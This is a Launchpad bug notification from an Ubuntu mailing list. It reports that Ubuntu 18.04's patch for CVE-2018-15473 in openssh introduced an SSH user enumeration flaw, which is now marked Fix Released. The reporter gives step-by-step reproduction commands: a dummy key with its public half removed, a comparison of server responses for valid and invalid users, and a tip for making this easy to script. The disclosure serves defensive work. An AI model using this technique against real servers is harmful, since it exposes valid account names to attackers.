[Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
Marc Deslauriers
1934501 at bugs.launchpad.net
Thu Aug 12 13:06:58 UTC 2021
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest: sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root at 75569fbf0b03:/# apt update
...snip...
root at 75569fbf0b03:/# apt install openssh-server
...snip...
root at 75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-========================================-=========================-=========================-=====================================================================================
ii openssh-client 1:7.6p1-4ubuntu0.3 amd64 secure shell (SSH) client, for secure access to remote machines
ii openssh-server 1:7.6p1-4ubuntu0.3 amd64 secure shell (SSH) server, for secure access from remote machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3 amd64 secure shell (SSH) sftp server module, for SFTP access from remote machines
root at 75569fbf0b03:/# mkdir /run/sshd
root at 75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid at 172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root at 172.17.0.2
root at 172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
More information about the foundations-bugs
mailing list